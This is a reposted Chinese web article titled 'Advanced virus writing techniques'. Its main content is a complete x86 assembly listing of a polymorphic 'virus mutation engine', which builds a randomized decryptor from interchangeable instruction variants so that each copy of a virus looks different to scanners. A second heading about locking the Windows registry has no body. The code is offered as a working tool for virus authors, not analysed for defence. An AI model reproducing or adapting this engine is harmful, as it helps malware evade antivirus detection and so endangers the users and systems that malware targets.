首页 > > 网络编程 > 其它 >

病毒的高级编写技巧

2008-04-09 04:00:04来源：互联网阅读 ()

病毒的高级编写技巧

Author: whg
Email: whg@whitecell.org
Homepage:http://www.whitecell.org

1、超级病毒变形引擎

此段代码会在DATA段内生成一个解密代码。

.586p
.model flat,STDCALL
extrn ExitProcess: proc
VirusSize=100h
.data

DecodeMethod dd ?
DeCode:
pushad
call Encode
db 100h dup(11h)
Encode:
db 100h dup(0cch)
RndReg0 dd 0 ;eax
RndReg1 dd 0 ;ebx
RndCode dd 0 ;Rnd Code
RndMima dd 60932561 ;Rnd Password

.code
@@Start:
mov eax,RndMima
ror eax,7
mov RndCode,eax

mov eax,RndCode
mov ecx,eax
and eax,011b
mov RndReg0,eax
xor ecx,RndMima
and ecx,011b
cmp eax,ecx
jnz short ChooseRegOk
inc ecx
and ecx,011b
ChooseRegOk:
mov RndReg1,ecx

mov edi,offset Encode

ror RndCode,1
call GetBxCode,0,RndReg0,RndCode
mov esi,eax
ContFillStep0:
cld
lodsb
stosb
cmp al,0cch
jnz ContFillStep0
dec edi

ror RndCode,1
call GetBxCode,1,RndReg1,RndCode
mov esi,eax
ContFillStep1:
cld
lodsb
stosb
cmp al,0cch
jnz ContFillStep1
dec edi

mov ebx,edi ;//计算机Jmp指令用

ror RndCode,1
call GetBxCode,2,RndReg0,RndCode
mov esi,eax
ContFillStep2:
cld
lodsb
stosb
cmp al,0cch
jnz ContFillStep2
dec edi

mov eax,RndMima
mov [edi-4],eax ;//填写随机密码
mov eax,RndCode
and eax,01
mov DecodeMethod,eax ;//填写DeCode方法

ror RndCode,1
call GetBxCode,3,RndReg0,RndCode
mov esi,eax
ContFillStep3:
cld
lodsb
stosb
cmp al,0cch
jnz ContFillStep3
dec edi

ror RndCode,1
call GetBxCode,4,RndReg1,RndCode
mov esi,eax
ContFillStep4:
cld
lodsb
stosb
cmp al,0cch
jnz ContFillStep4
dec edi

ror RndCode,1
call GetBxCode,5,RndReg0,RndCode
mov esi,eax
ContFillStep5:
cld
lodsb
stosb
cmp al,0cch
jnz ContFillStep5
dec edi

mov al,0c3h
mov [edi],al ;//填写Ret指令

sub ebx,edi
mov [edi-1],bl ;//填写jmp指令

int 3;

jmp DeCode
ret
GetBxCode proc uses ebx ecx edx esi edi,Step:dword,Reg:dword,Rnd:dword
call GetBxCodeAddr
Step0_Eax:
mov eax,[esp]
int 3;
pop eax
push eax
int 3;
Step0_Ebx:
pop ebx
push ebx
int 3;
push dword ptr[esp]
pop ebx
int 3;
Step0_Ecx:
mov ecx,[esp]
int 3;
pop ecx
push ecx
int 3;
Step0_Edx:
mov edx,[esp]
int 3;
mov edx,esp
mov edx,[edx]
int 3

Step1_Eax:
mov eax,VirusSize
int 3
sub eax,eax
add ax,VirusSize 3081h
sub ax,3081h
int 3
Step1_Ebx:
mov ebx,VirusSize
int 3;
xor ebx,ebx
or bx,VirusSize
int 3;
Step1_Ecx:
sub ecx,ecx
xor ecx,(VirusSize xor 3181h)
xor ecx,(3181h)
int 3;
mov ecx,0
and cx,VirusSize
int 3
Step1_Edx:
and edx,0
xor dx,(VirusSize-0281h)
add dx,0281h
int 3;
xor edx,edx
sub edx,(0181h-VirusSize)
sub edx,-0181h
int 3;

Setp2_Eax:
xor [eax],12345678h
int 3
add [eax],12345678h
int 3
Setp2_Ebx:
xor [ebx],12345678h
int 3;
add [ebx],12345678h
int 3;

Setp2_Ecx:
xor [ecx],12345678h
int 3;
add [ecx],12345678h
int 3;
Setp2_Edx:
xor [edx],12345678h
int 3;
add [edx],12345678h
int 3;
Step3_Eax:
add eax,4
int 3
inc eax
inc eax
inc eax
inc eax
int 3;
Step3_Ebx:
add ebx,5
dec ebx
int 3
add ebx,2
add ebx,2
int 3;
Step3_Ecx:
sub ecx,-4
int 3
sub ecx,-5
dec ecx
int 3;
Step3_Edx:
inc edx
sub edx,-3
int 3
add edx,04
int 3;

Step4_Eax:
sub eax,4
int 3
dec eax
dec eax
dec eax
sub eax,1
int 3;
Step4_Ebx:
dec ebx
sub ebx,3
int 3;
dec ebx
dec ebx
sub ebx,2
int 3;
Step4_Ecx:
add cx,123
sub cx,123 4
int 3
sub cx,-4
dec cx
sub cx,7
int 3
Step4_Edx:
sub dx,2
dec dx
sub dx,1
int 3
inc edx
sub dx,5
int 3;
Step5_Eax:
jnz $
int 3
ja $
int 3
Step5_Ebx:
jg $
int 3
jnb $
int 3
Step5_Ecx:
jnl $
int 3
jnz $
int 3
Step5_Edx:
ja $
int 3
jg $
int 3

GetBxCodeAddr:
pop esi
mov al,0cch ;//指令分割符
mov ecx,Step
shl ecx,1
shl ecx,1
add ecx,Reg ;//计算机得到的指令位置
shl ecx,1
and Rnd,01b
add ecx,Rnd
jcxz short GetBxCodeOver
ContFindCode:
push ecx
ContFindCC:
inc esi
cmp [esi],al
jnz ContFindCC
pop ecx
loop ContFindCode
mov eax,esi
inc eax
ret
GetBxCodeOver:
mov eax,esi
ret
GetBxCode endp

end @@Start

2、Windows 9x/2000/xp 琐定注册表

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有